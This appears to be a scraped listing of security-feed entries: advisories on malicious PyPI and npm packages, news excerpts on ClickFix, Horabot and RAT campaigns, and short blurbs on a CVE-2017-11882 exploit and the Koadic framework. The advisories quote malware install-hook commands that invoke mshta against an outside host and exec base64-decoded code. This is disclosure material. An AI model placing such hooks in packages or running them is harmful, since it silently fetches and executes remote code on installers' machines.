Malicious code in tobihook (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb The package masquerades as an HTTP helper functions named post/get/fetch, module comment ' request/init.py', and an unused requests dependency but ea...

Malicious code in aillmgen (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...

MAL-2026-5927 Malicious code in aillmgen (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...

MAL-2026-5876 Malicious code in temp-development-package-test (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5cdc1d94dd0cfb62a4a0267ae52bf1a72dfa31a6854196b4bb220759b7c6e878 Starting with version 0.4, package installs a sitecustomize.py that executes during Python engine initialization. The embeded code uses mshta to download...

Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

MAL-2026-5824 Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico

Introduction In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot , a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex...

Hacked sites deliver Vidar infostealer to Windows users

In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves. Our researchers have recently detected a campaig...

Can you use too many LOLBins to drop some RATs?

Recently, our team came across an infection attempt that stood out—not for its sophistication, but for how determined the attacker was to take a “living off the land” approach to the extreme. The end goal was to deploy Remcos , a Remote Access Trojan RAT, and NetSupport Manager , a legitimate...

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign "uses CountLoader as the initial tool in a multistage attack for...

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT

Cybersecurity researchers are calling attention to a new campaign dubbed JSSMUGGLER that has been observed leveraging compromised websites as a distribution vector for a remote access trojan named NetSupport RAT. The attack chain, analyzed by Securonix, involves three main moving parts: An...

New ClickFix wave infects users with hidden malware in images and fake Windows updates

Several researchers have flagged a new development in the ongoing ClickFix campaign: Attackers are now mimicking a Windows update screen to trick people into running malware. ClickFix campaigns use convincing lures, historically “Human Verification” screens, and now a fake “Windows Update” splash...

New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT

Cybersecurity researchers have discovered malware campaigns using the now-prevalent ClickFix social engineering tactic to deploy Amatera Stealer and NetSupport RAT. The activity, observed this month, is being tracked by eSentire under the moniker EVALUSION. First spotted in June 2025, Amatera is...

EUVD-2006-3690

Malware in sbrugna...

pentest_compilation

It is an offensive tool for Windows. The repository contains a compilation of commands, tips, and scripts used for penetration testing and red teaming exercises. The provided code snippet is an XML file named "detalle.SettingContent-ms" located in the "Phishing" directory. This file appears to be...

Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise. Some of the notable malware families that are being distributed using this method include AsyncRAT,...

New Report Uncovers Emotet's Delivery and Evasion Techniques Used in Recent Attacks

Threat actors associated with the notorious Emotet malware are continually shifting their tactics and command-and-control C2 infrastructure to escape detection, according to new research from VMware. Emotet is the work of a threat actor tracked as Mummy Spider aka TA542, emerging in June 2014 as ...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

CVE-2017-11882 43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882 109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ （膜一波，现在unamer的代码已经可以执行shellcode了） CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-118...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

CVE-2017-11882 43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882 109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ （膜一波，现在unamer的代码已经可以执行shellcode了） CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-118...

Koadic - COM Command & Control Framework (JScript RAT)

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host a.k.a. JScript/VBScript, with compatibility in t...